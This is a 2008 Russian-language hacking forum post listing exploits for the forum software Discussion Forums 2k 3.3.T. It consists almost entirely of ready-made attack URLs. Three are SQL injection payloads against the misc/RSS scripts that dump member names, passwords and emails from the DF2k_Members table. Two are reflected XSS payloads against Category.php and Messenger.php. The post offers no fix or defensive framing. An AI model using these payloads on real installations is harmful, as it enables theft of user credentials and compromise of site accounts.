01.10.2008, 17:00
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Форум: Discussion Forums 2k
Версия: 3.3.T
Офф.сайт: http://developer.berlios.de/projects/df2k/
SQL Injection
Код:
http://localhost/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*
Код:
http://localhost/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*
Код:
http://localhost/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*
XSS Passive
http://localhost/ [installdir]/Category.php?id="><script>alert('xss')</script>&SubID=0
http://localhost/ [installdir]/Messenger.php?act=Create&Sendto="><script>alert('x ss')</script>
(c) ~!Dok_tOR!~
|
|
|